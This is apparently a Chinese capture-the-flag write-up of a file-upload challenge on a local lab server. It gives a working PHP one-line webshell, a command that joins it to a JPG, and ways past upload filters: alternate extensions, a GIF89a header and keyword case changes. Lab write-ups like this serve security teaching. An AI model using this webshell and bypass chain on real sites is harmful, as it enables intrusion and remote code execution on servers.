1、上传正常的图片（.jpg格式）

2、盲猜是做了黑名单或者是白名单的校验，尝试制作上传图片木马进行过滤绕过

准备工作：

• 1个正常上传的图片
• 1个一句话木马（php）

执行命令：

copy 1.jpg/b+1.php YiJuHua.jpg/b

上传图片木马

上传成功

3、连接图片木马

—— 这里测试连接不成功，是由于WAF不止对文件后缀做了校验，还对文件内容进行了校验

4、猜测是WAF进行了数据包内容校验，使用burp抓包，修改数据包（注意，需要burp截断更改数据包内容）

修改文件后缀：php3、php5、pht等

修改文件格式：

GIF89a

<?php @eval($_POST['shell']);?>

关键字大小写绕过过滤：

<?php @Eval($_POST['shell']);?>

解释：

• 通常，在嵌入了php脚本的html中，使用 phtml作为后缀名；完全是php写的，则使用php作为后缀名。这两种文件，web服务器都会用php解释器进行解析。
• 当不能使用php代码直接注入时可以改为phtml格式加入GIF89a（图片头文件欺骗），后台认为是图片，上传后再执行木马。

• 先将文件改为.jpg欺骗网址第一层，抓包将filename改为以.php5结尾进行文件后缀校验绕过，GIF89a则负责骗过文件头部校验第二层，最后修改eval为Eval，进行大写绕过关键字过滤第三层防护。

上传成功：http://192.168.154.253:82/vulnerabilities/YiJuHua.php5

5、连接后门地址

6、获得flag